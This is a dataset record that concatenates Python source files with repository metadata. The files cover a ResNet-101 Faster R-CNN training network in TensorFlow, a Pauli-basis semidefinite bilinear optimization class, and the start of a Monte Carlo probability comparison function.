Python
| false
| false
| 24,311
|
py
|
import tensorflow as tf
from networks.network import Network
import pdb
from ..fast_rcnn.config import cfg
# Module-level defaults. NOTE: setup() re-binds all three locally
# (n_classes from cfg.NCLASSES), so these act only as fallbacks.
n_classes = 21  # presumably 20 object classes + background (Pascal VOC) — confirm
_feat_stride = [16,]  # overall stride of the backbone feature map
anchor_scales = [2,4,8,16,32]  # RPN anchor scales
class ResNet101_train(Network):
    def __init__(self, trainable=True):
        """Declare the TF1-style input placeholders and build the graph.

        Placeholder shapes (from the declarations below):
        data [N,H,W,3] image batch; im_info [N,3]; gt_boxes [N,5]
        (presumably 4 box coords + class label — confirm); gt_ishard [N];
        dontcare_areas [N,4].
        """
        self.inputs = []
        self.data = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='data')
        self.im_info = tf.placeholder(tf.float32, shape=[None, 3], name='im_info')
        self.gt_boxes = tf.placeholder(tf.float32, shape=[None, 5], name='gt_boxes')
        self.gt_ishard = tf.placeholder(tf.int32, shape=[None], name='gt_ishard')
        self.dontcare_areas = tf.placeholder(tf.float32, shape=[None, 4], name='dontcare_areas')
        #self.scene = tf.placeholder(tf.float32, shape=[1,205])
        self.keep_prob = tf.placeholder(tf.float32)
        # Named layer registry consumed by the Network.feed() chaining API.
        self.layers = dict({'data':self.data, 'im_info':self.im_info, 'gt_boxes':self.gt_boxes,\
            'gt_ishard': self.gt_ishard, 'dontcare_areas': self.dontcare_areas})
        self.trainable = trainable
        self.setup()
def setup(self):
n_classes = cfg.NCLASSES
# anchor_scales = [8, 16, 32]
anchor_scales = [2,4,8,16,32]
_feat_stride = [16, ]
(self.feed('data')
.conv(7, 7, 64, 2, 2, biased=False, relu=False, name='conv1')
.batch_normalization(relu=True, name='bn_conv1', is_training=False)
.max_pool(3, 3, 2, 2, padding='VALID',name='pool1')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2a_branch1')
.batch_normalization(name='bn2a_branch1',is_training=False,relu=False))
(self.feed('pool1')
.conv(1, 1, 64, 1, 1, biased=False, relu=False, name='res2a_branch2a')
.batch_normalization(relu=True, name='bn2a_branch2a',is_training=False)
.conv(3, 3, 64, 1, 1, biased=False, relu=False, name='res2a_branch2b')
.batch_normalization(relu=True, name='bn2a_branch2b',is_training=False)
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2a_branch2c')
.batch_normalization(name='bn2a_branch2c',is_training=False,relu=False))
(self.feed('bn2a_branch1',
'bn2a_branch2c')
.add(name='res2a')
.relu(name='res2a_relu')
.conv(1, 1, 64, 1, 1, biased=False, relu=False, name='res2b_branch2a')
.batch_normalization(relu=True, name='bn2b_branch2a',is_training=False)
.conv(3, 3, 64, 1, 1, biased=False, relu=False, name='res2b_branch2b')
.batch_normalization(relu=True, name='bn2b_branch2b',is_training=False)
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2b_branch2c')
.batch_normalization(name='bn2b_branch2c',is_training=False,relu=False))
(self.feed('res2a_relu',
'bn2b_branch2c')
.add(name='res2b')
.relu(name='res2b_relu')
.conv(1, 1, 64, 1, 1, biased=False, relu=False, name='res2c_branch2a')
.batch_normalization(relu=True, name='bn2c_branch2a',is_training=False)
.conv(3, 3, 64, 1, 1, biased=False, relu=False, name='res2c_branch2b')
.batch_normalization(relu=True, name='bn2c_branch2b',is_training=False)
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2c_branch2c')
.batch_normalization(name='bn2c_branch2c',is_training=False,relu=False))
(self.feed('res2b_relu',
'bn2c_branch2c')
.add(name='res2c')
.relu(name='res2c_relu')
.conv(1, 1, 512, 2, 2, biased=False, relu=False, name='res3a_branch1',padding='VALID')
.batch_normalization(name='bn3a_branch1',is_training=False,relu=False))
(self.feed('res2c_relu')
.conv(1, 1, 128, 2, 2, biased=False, relu=False, name='res3a_branch2a',padding='VALID')
.batch_normalization(relu=True, name='bn3a_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3a_branch2b')
.batch_normalization(relu=True, name='bn3a_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3a_branch2c')
.batch_normalization(name='bn3a_branch2c',is_training=False,relu=False))
(self.feed('bn3a_branch1',
'bn3a_branch2c')
.add(name='res3a')
.relu(name='res3a_relu')
.conv(1, 1, 128, 1, 1, biased=False, relu=False, name='res3b1_branch2a')
.batch_normalization(relu=True, name='bn3b1_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3b1_branch2b')
.batch_normalization(relu=True, name='bn3b1_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3b1_branch2c')
.batch_normalization(name='bn3b1_branch2c',is_training=False,relu=False))
(self.feed('res3a_relu',
'bn3b1_branch2c')
.add(name='res3b1')
.relu(name='res3b1_relu')
.conv(1, 1, 128, 1, 1, biased=False, relu=False, name='res3b2_branch2a')
.batch_normalization(relu=True, name='bn3b2_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3b2_branch2b')
.batch_normalization(relu=True, name='bn3b2_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3b2_branch2c')
.batch_normalization(name='bn3b2_branch2c',is_training=False,relu=False))
(self.feed('res3b1_relu',
'bn3b2_branch2c')
.add(name='res3b2')
.relu(name='res3b2_relu')
.conv(1, 1, 128, 1, 1, biased=False, relu=False, name='res3b3_branch2a')
.batch_normalization(relu=True, name='bn3b3_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3b3_branch2b')
.batch_normalization(relu=True, name='bn3b3_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3b3_branch2c')
.batch_normalization(name='bn3b3_branch2c',is_training=False,relu=False))
(self.feed('res3b2_relu',
'bn3b3_branch2c')
.add(name='res3b3')
.relu(name='res3b3_relu')
.conv(1, 1, 1024, 2, 2, biased=False, relu=False, name='res4a_branch1',padding='VALID')
.batch_normalization(name='bn4a_branch1',is_training=False,relu=False))
(self.feed('res3b3_relu')
.conv(1, 1, 256, 2, 2, biased=False, relu=False, name='res4a_branch2a',padding='VALID')
.batch_normalization(relu=True, name='bn4a_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4a_branch2b')
.batch_normalization(relu=True, name='bn4a_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4a_branch2c')
.batch_normalization(name='bn4a_branch2c',is_training=False,relu=False))
(self.feed('bn4a_branch1',
'bn4a_branch2c')
.add(name='res4a')
.relu(name='res4a_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b1_branch2a')
.batch_normalization(relu=True, name='bn4b1_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b1_branch2b')
.batch_normalization(relu=True, name='bn4b1_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b1_branch2c')
.batch_normalization(name='bn4b1_branch2c',is_training=False,relu=False))
(self.feed('res4a_relu',
'bn4b1_branch2c')
.add(name='res4b1')
.relu(name='res4b1_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b2_branch2a')
.batch_normalization(relu=True, name='bn4b2_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b2_branch2b')
.batch_normalization(relu=True, name='bn4b2_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b2_branch2c')
.batch_normalization(name='bn4b2_branch2c',is_training=False,relu=False))
(self.feed('res4b1_relu',
'bn4b2_branch2c')
.add(name='res4b2')
.relu(name='res4b2_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b3_branch2a')
.batch_normalization(relu=True, name='bn4b3_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b3_branch2b')
.batch_normalization(relu=True, name='bn4b3_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b3_branch2c')
.batch_normalization(name='bn4b3_branch2c',is_training=False,relu=False))
(self.feed('res4b2_relu',
'bn4b3_branch2c')
.add(name='res4b3')
.relu(name='res4b3_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b4_branch2a')
.batch_normalization(relu=True, name='bn4b4_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b4_branch2b')
.batch_normalization(relu=True, name='bn4b4_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b4_branch2c')
.batch_normalization(name='bn4b4_branch2c',is_training=False,relu=False))
(self.feed('res4b3_relu',
'bn4b4_branch2c')
.add(name='res4b4')
.relu(name='res4b4_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b5_branch2a')
.batch_normalization(relu=True, name='bn4b5_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b5_branch2b')
.batch_normalization(relu=True, name='bn4b5_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b5_branch2c')
.batch_normalization(name='bn4b5_branch2c',is_training=False,relu=False))
(self.feed('res4b4_relu',
'bn4b5_branch2c')
.add(name='res4b5')
.relu(name='res4b5_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b6_branch2a')
.batch_normalization(relu=True, name='bn4b6_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b6_branch2b')
.batch_normalization(relu=True, name='bn4b6_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b6_branch2c')
.batch_normalization(name='bn4b6_branch2c',is_training=False,relu=False))
(self.feed('res4b5_relu',
'bn4b6_branch2c')
.add(name='res4b6')
.relu(name='res4b6_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b7_branch2a')
.batch_normalization(relu=True, name='bn4b7_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b7_branch2b')
.batch_normalization(relu=True, name='bn4b7_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b7_branch2c')
.batch_normalization(name='bn4b7_branch2c',is_training=False,relu=False))
(self.feed('res4b6_relu',
'bn4b7_branch2c')
.add(name='res4b7')
.relu(name='res4b7_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b8_branch2a')
.batch_normalization(relu=True, name='bn4b8_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b8_branch2b')
.batch_normalization(relu=True, name='bn4b8_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b8_branch2c')
.batch_normalization(name='bn4b8_branch2c',is_training=False,relu=False))
(self.feed('res4b7_relu',
'bn4b8_branch2c')
.add(name='res4b8')
.relu(name='res4b8_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b9_branch2a')
.batch_normalization(relu=True, name='bn4b9_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b9_branch2b')
.batch_normalization(relu=True, name='bn4b9_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b9_branch2c')
.batch_normalization(name='bn4b9_branch2c',is_training=False,relu=False))
(self.feed('res4b8_relu',
'bn4b9_branch2c')
.add(name='res4b9')
.relu(name='res4b9_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b10_branch2a')
.batch_normalization(relu=True, name='bn4b10_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b10_branch2b')
.batch_normalization(relu=True, name='bn4b10_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b10_branch2c')
.batch_normalization(name='bn4b10_branch2c',is_training=False,relu=False))
(self.feed('res4b9_relu',
'bn4b10_branch2c')
.add(name='res4b10')
.relu(name='res4b10_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b11_branch2a')
.batch_normalization(relu=True, name='bn4b11_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b11_branch2b')
.batch_normalization(relu=True, name='bn4b11_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b11_branch2c')
.batch_normalization(name='bn4b11_branch2c',is_training=False,relu=False))
(self.feed('res4b10_relu',
'bn4b11_branch2c')
.add(name='res4b11')
.relu(name='res4b11_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b12_branch2a')
.batch_normalization(relu=True, name='bn4b12_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b12_branch2b')
.batch_normalization(relu=True, name='bn4b12_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b12_branch2c')
.batch_normalization(name='bn4b12_branch2c',is_training=False,relu=False))
(self.feed('res4b11_relu',
'bn4b12_branch2c')
.add(name='res4b12')
.relu(name='res4b12_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b13_branch2a')
.batch_normalization(relu=True, name='bn4b13_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b13_branch2b')
.batch_normalization(relu=True, name='bn4b13_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b13_branch2c')
.batch_normalization(name='bn4b13_branch2c',is_training=False,relu=False))
(self.feed('res4b12_relu',
'bn4b13_branch2c')
.add(name='res4b13')
.relu(name='res4b13_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b14_branch2a')
.batch_normalization(relu=True, name='bn4b14_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b14_branch2b')
.batch_normalization(relu=True, name='bn4b14_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b14_branch2c')
.batch_normalization(name='bn4b14_branch2c',is_training=False,relu=False))
(self.feed('res4b13_relu',
'bn4b14_branch2c')
.add(name='res4b14')
.relu(name='res4b14_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b15_branch2a')
.batch_normalization(relu=True, name='bn4b15_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b15_branch2b')
.batch_normalization(relu=True, name='bn4b15_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b15_branch2c')
.batch_normalization(name='bn4b15_branch2c',is_training=False,relu=False))
(self.feed('res4b14_relu',
'bn4b15_branch2c')
.add(name='res4b15')
.relu(name='res4b15_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b16_branch2a')
.batch_normalization(relu=True, name='bn4b16_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b16_branch2b')
.batch_normalization(relu=True, name='bn4b16_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b16_branch2c')
.batch_normalization(name='bn4b16_branch2c',is_training=False,relu=False))
(self.feed('res4b15_relu',
'bn4b16_branch2c')
.add(name='res4b16')
.relu(name='res4b16_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b17_branch2a')
.batch_normalization(relu=True, name='bn4b17_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b17_branch2b')
.batch_normalization(relu=True, name='bn4b17_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b17_branch2c')
.batch_normalization(name='bn4b17_branch2c',is_training=False,relu=False))
(self.feed('res4b16_relu',
'bn4b17_branch2c')
.add(name='res4b17')
.relu(name='res4b17_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b18_branch2a')
.batch_normalization(relu=True, name='bn4b18_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b18_branch2b')
.batch_normalization(relu=True, name='bn4b18_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b18_branch2c')
.batch_normalization(name='bn4b18_branch2c',is_training=False,relu=False))
(self.feed('res4b17_relu',
'bn4b18_branch2c')
.add(name='res4b18')
.relu(name='res4b18_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b19_branch2a')
.batch_normalization(relu=True, name='bn4b19_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b19_branch2b')
.batch_normalization(relu=True, name='bn4b19_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b19_branch2c')
.batch_normalization(name='bn4b19_branch2c',is_training=False,relu=False))
(self.feed('res4b18_relu',
'bn4b19_branch2c')
.add(name='res4b19')
.relu(name='res4b19_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b20_branch2a')
.batch_normalization(relu=True, name='bn4b20_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b20_branch2b')
.batch_normalization(relu=True, name='bn4b20_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b20_branch2c')
.batch_normalization(name='bn4b20_branch2c',is_training=False,relu=False))
(self.feed('res4b19_relu',
'bn4b20_branch2c')
.add(name='res4b20')
.relu(name='res4b20_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b21_branch2a')
.batch_normalization(relu=True, name='bn4b21_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b21_branch2b')
.batch_normalization(relu=True, name='bn4b21_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b21_branch2c')
.batch_normalization(name='bn4b21_branch2c',is_training=False,relu=False))
(self.feed('res4b20_relu',
'bn4b21_branch2c')
.add(name='res4b21')
.relu(name='res4b21_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b22_branch2a')
.batch_normalization(relu=True, name='bn4b22_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b22_branch2b')
.batch_normalization(relu=True, name='bn4b22_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b22_branch2c')
.batch_normalization(name='bn4b22_branch2c',is_training=False,relu=False))
(self.feed('res4b21_relu',
'bn4b22_branch2c')
.add(name='res4b22')
.relu(name='res4b22_relu'))
#========= RPN ============
(self.feed('res4b22_relu')
.conv(3,3,512,1,1,name='rpn_conv/3x3')
.conv(1,1,len(anchor_scales)*3*2 ,1 , 1, padding='VALID', relu = False, name='rpn_cls_score'))
(self.feed('rpn_cls_score', 'gt_boxes', 'im_info','data')
.anchor_target_layer(_feat_stride, anchor_scales, name = 'rpn-data' ))
# Loss of rpn_cls & rpn_boxes
(self.feed('rpn_conv/3x3')
.conv(1,1,len(anchor_scales)*3*4, 1, 1, padding='VALID', relu = False, name='rpn_bbox_pred'))
#========= RoI Proposal ============
(self.feed('rpn_cls_score')
.spatial_reshape_layer(2, name = 'rpn_cls_score_reshape')
.spatial_softmax(name='rpn_cls_prob'))
(self.feed('rpn_cls_prob')
.spatial_reshape_layer(len(anchor_scales)*3*2, name = 'rpn_cls_prob_reshape'))
(self.feed('rpn_cls_prob_reshape','rpn_bbox_pred','im_info')
.proposal_layer(_feat_stride, anchor_scales, 'TRAIN',name = 'rpn_rois'))
(self.feed('rpn_rois','gt_boxes')
.proposal_target_layer(n_classes,name = 'roi-data'))
#========= Union Box ==========
(self.feed('roi-data', 'im_info')
.union_box_layer(name='whole_box'))
(self.feed('res4b22_relu', 'whole_box')
.roi_pool(7, 7, 1.0/16, name='whole_pool'))
#========= RCNN ============
(self.feed('res4b22_relu', 'roi-data')
.roi_pool(7, 7, 1.0/16, name='pool_5'))
#(self.feed('pool_5')
# .fc(1024, name='fc_add'))
(self.feed('pool_5','whole_pool')
.concat(axis=0, name='concat')
.fc(4096, name='fc6'))
(self.feed('roi-data','fc6')
.edge_box_layer(n_boxes=200,fc_dim=64,feat_dim=4096,dim=(4096, 4096, 4096),group=64, index=1,name='edges'))
(self.feed('fc6', 'edges')
.structure_inference_spmm(boxes=200, name='inference')
.fc(n_classes, relu=False, name='cls_score')
.softmax(name='cls_prob'))
(self.feed('inference')
.fc(n_classes*4, relu=False, name='bbox_pred'))
|
[
"603207232@qq.com"
] |
603207232@qq.com
|
363ceba786438dee7410cbcfa90f485b4dba6b31
|
0385ab743407cbc7276ec80c6307310690e9a6ec
|
/bilinear opt/src/semidefinite.py
|
741b46196b604c46b393a6bb80672f3359f55ef6
|
[] |
no_license
|
gsenno/bilinear-opt
|
f57449821ae5fe84f828c6354d39508be7088e77
|
0d7743bca803cbd090d6b7de488a06d08dd88811
|
refs/heads/master
| 2020-04-14T16:14:45.866287
| 2019-08-19T22:40:34
| 2019-08-19T22:40:34
| 163,946,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,845
|
py
|
from tree import *
from problem import *
import numpy as np
import picos as sdp
import cvxopt as cvx
# Pauli sigmas (identity, X, Y-like, Z).
# NOTE(review): sigmas[2] = [[0, i], [-i, 0]] is the transpose (i.e. the
# negative) of the conventional sigma_y = [[0, -i], [i, 0]]. This is harmless
# for use as a trace-orthonormal Hermitian basis, but confirm the intended
# sign convention if results are compared against textbook formulas.
sigmas = [[[1.,0.],[0.,1.]], [[0.,1.],[1.,0.]], [[0.,1.j],[-1.j,0.]], [[1.,0.],[0.,-1.]]]
# their transpose
sigmast = [[[1.,0.],[0.,1.]], [[0.,1.],[1.,0.]], [[0.,-1.j],[1.j,0.]], [[1.,0.],[0.,-1.]]]
# their trace (only the identity has nonzero trace)
tracesigma = [2.0, 0.0, 0.0, 0.0]


def Pauli(j, nqubits, skip=frozenset(), transp=frozenset()):
    """Return the j-th element of the Pauli basis for Hermitian operators on
    (C^2)^{tensor nqubits}, normalized with respect to the trace inner product.

    j:       index in [0, 4**nqubits); its base-4 digits select the single-qubit
             factor (0=I, 1=X, 2=Y-like, 3=Z) for each qubit in turn.
    nqubits: number of qubits.
    skip:    qubit positions to trace out instead of tensoring in (the factor's
             trace is multiplied in, so only identity factors survive).
    transp:  qubit positions whose factor is transposed (partial transpose).

    Returns an np.matrix of shape (2**k, 2**k) with k = nqubits - len(skip & range).
    """
    assert(isinstance(j, int) and isinstance(nqubits, int))
    assert(j >= 0 and j < 4**nqubits)
    val = np.matrix([[1]])
    for idx in range(nqubits):
        if idx not in skip:
            # tensor in the factor selected by the current base-4 digit
            if idx in transp:
                val = np.kron(val, sigmast[j % 4])
            else:
                val = np.kron(val, sigmas[j % 4])
        else:
            # trace out this factor instead of tensoring it in
            val = val * tracesigma[j % 4]
        # advance to the next base-4 digit (was int(np.floor(j / 4)))
        j //= 4
    # np.sqrt replaces a bare `sqrt` that silently relied on a star import
    return val / np.sqrt(2**nqubits)
class QuantumBilinearProblem(BilinearProblem):
    """Bilinear optimization problem whose two variables are direct sums of
    Hermitian operators, encoded as real coefficient vectors in the
    trace-normalized Pauli basis and delegated to BilinearProblem's vector form.
    """

    def __init__(self):
        BilinearProblem.__init__(self)
        # dims[0][i] / dims[1][j]: Hilbert-space dimensions of the i-th X /
        # j-th Y subsystem (each assumed to be a power of 2).
        self.dims = [[]]

    def init_matrix_form(self, dims, J, A=None, B=None, maximize=False, verb=1):
        # syntax for dims - [[a_1, a_2, a_3, ...], [b_1, b_2, b_3, ...]]
        # all these values currently have to be powers of 2
        # interprets first variable as a direct sum of a_i-dimensional subsystems,
        # and the second variable as a direct sum of b_i-dimensional subsystems
        # J is a array of the form of dims where every entry is a a_i*b_j matrix
        # defining the correlations between the i-th X-variable and the j-th Y-variable
        self.dims = dims
        # total dimension of the vector problem (each d-dim Hermitian block
        # contributes d**2 real Pauli coefficients)
        dimX = np.sum(np.array(dims[0])**2)
        dimY = np.sum(np.array(dims[1])**2)
        numX = len(dims[0])
        numY = len(dims[1])
        if verb >= 1:
            print('problem shape:', numX, 'x', numY)
        assert(len(J) == numX and len(J[0]) == numY)
        # Expand default arguments (None or [] -> zero operators).
        # BUG FIX: the defaults used to be mutable lists (A=[], B=[]) that were
        # appended to in place, so zero blocks accumulated across calls and the
        # `A == []` guard was False on every call after the first.
        if not A:
            A = [np.zeros((dims[0][j], dims[0][j])) for j in range(numX)]
        if not B:
            B = [np.zeros((dims[1][j], dims[1][j])) for j in range(numY)]
        # initialize Q matrix and vectors a and b
        Q = np.zeros((dimX, dimY))
        a = np.zeros(dimX)
        b = np.zeros(dimY)
        basei = 0
        for k in range(numX):
            nqX = int(np.log2(dims[0][k]))  # dimension of X variable (in qubits)
            basej = 0
            for l in range(numY):
                nqY = int(np.log2(dims[1][l]))  # dimension of Y variable (in qubits)
                if verb >= 2:
                    print('correlations matrix: ', nqX, 'x', nqY, 'qbits.')
                corr = np.matrix(J[k][l])  # correlation matrix
                # create entries for Q matrix: coefficients of corr in the
                # product Pauli basis
                for i in range(dims[0][k]**2):
                    for j in range(dims[1][l]**2):
                        Q[basei+i][basej+j] = \
                            np.real(np.trace( np.kron(Pauli(i, nqX), Pauli(j, nqY)) * corr ))
                # create vector a
                for i in range(dims[0][k]**2):
                    a[basei+i] = np.real(np.trace( Pauli(i, nqX) * np.matrix(A[k]) ))
                # create vector b
                for j in range(dims[1][l]**2):
                    b[basej+j] = np.real(np.trace( Pauli(j, nqY) * np.matrix(B[l]) ))
                basej += dims[1][l]**2
            basei += dims[0][k]**2
        if verb >= 1:
            print('convert to vector problem...')
            print('** Q =', Q)
            print('** a =', a)
            print('** b =', b)
        self.init_vector_form(Q=Q, a=a, b=b, maximize=maximize, verb=verb)

    # helper functions that create matrix variable and matrix solutions
    def __getvarparams(self, var, idx):
        # (block dimension, block size in qubits, offset of the block's
        # coefficients inside the flat variable vector)
        dim = self.dims[var][idx]
        return (dim, int(np.log2(dim)), int(np.sum(np.array(self.dims[var][0:idx])**2)))

    def matvarX(self, idx=0, qubits=None, transp={}):
        """Reassemble the idx-th X block as a cvxopt matrix expression,
        optionally restricted to `qubits` (others traced out) and partially
        transposed on `transp`."""
        (sqrtdim, nqubits, baseidx) = self.__getvarparams(0, idx)
        if qubits is None:
            skip = {}
        else:
            skip = set(range(nqubits)) - qubits
        X = self.varX()[baseidx]*cvx.matrix(Pauli(0, nqubits, skip))
        for i in range(1, sqrtdim**2):
            X += self.varX()[baseidx+i]*cvx.matrix(Pauli(i, nqubits, skip, set(transp)))
        return X

    def matvarY(self, idx=0, qubits=None, transp={}):
        """Same as matvarX, for the idx-th Y block."""
        (sqrtdim, nqubits, baseidx) = self.__getvarparams(1, idx)
        if qubits is None:
            skip = {}
        else:
            skip = set(range(nqubits)) - qubits
        Y = self.varY()[baseidx]*cvx.matrix(Pauli(0, nqubits, skip))
        for i in range(1, sqrtdim**2):
            Y += self.varY()[baseidx+i]*cvx.matrix(Pauli(i, nqubits, skip, set(transp)))
        return Y

    def matsolX(self, idx = 0):
        """Reassemble the idx-th X block of the numeric solution as an ndarray."""
        (sqrtdim, nqubits, baseidx) = self.__getvarparams(0, idx)
        X = np.zeros((sqrtdim, sqrtdim), dtype=np.complex_)
        for i in range(0, sqrtdim**2):
            X += self.solX[baseidx+i]*Pauli(i,nqubits)
        return np.array(X)

    def matsolY(self, idx = 0):
        """Reassemble the idx-th Y block of the numeric solution as an ndarray."""
        (sqrtdim, nqubits, baseidx) = self.__getvarparams(1, idx)
        Y = np.zeros((sqrtdim, sqrtdim), dtype=np.complex_)
        for i in range(0, sqrtdim**2):
            Y += self.solY[baseidx+i]*Pauli(i,nqubits)
        return np.array(Y)
|
[
"Gabriel Senno"
] |
Gabriel Senno
|
392c79002f49e52b52d194c26804c7be38c97f67
|
d11c5d1a1869de18377b82ab961e6285bd26d92b
|
/models/BEAST/CPC18BEAST/get_pBetter.py
|
49780e49d5bfee20da95ee1e2dc8924fc5129e7d
|
[] |
no_license
|
ManuelGuth/Interdisciplinary_Project_Decision_Making
|
23f793eda7b50d056ebdf118e0fd3c8d66cce691
|
20085b77e29e8dbbfd1c89512beee71056e53411
|
refs/heads/master
| 2022-12-19T06:41:16.333751
| 2020-09-04T08:30:00
| 2020-09-04T08:30:00
| 263,285,406
| 0
| 0
| null | 2020-06-26T14:21:41
| 2020-05-12T09:00:04
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,319
|
py
|
import numpy as np
from .distSample import distSample
def get_pBetter(DistX, DistY, corr, accuracy=10000):
    """Estimate by Monte Carlo the probability that a draw from DistX is
    strictly larger than a draw from DistY, and vice versa.

    DistX, DistY: two-column numpy matrices — column 0 holds outcomes,
        column 1 their probabilities.
    corr: correlation between the two draws — 1 uses the same uniform for
        both (comonotone), -1 uses u and 1-u (antithetic), anything else
        draws independently.
    accuracy: number of Monte Carlo samples.

    Returns [P(X > Y), P(Y > X)]; ties contribute to neither estimate.
    """
    nXbetter = 0
    nYbetter = 0
    for _ in range(accuracy):  # loop counter itself is unused
        rndNum = np.random.uniform(size=2)
        sampleX = distSample(DistX[:, 0], DistX[:, 1], rndNum[0])
        if corr == 1:
            # perfectly correlated: reuse the same uniform draw
            sampleY = distSample(DistY[:, 0], DistY[:, 1], rndNum[0])
        elif corr == -1:
            # perfectly anti-correlated: use the complementary uniform
            sampleY = distSample(DistY[:, 0], DistY[:, 1], 1 - rndNum[0])
        else:
            # independent draws
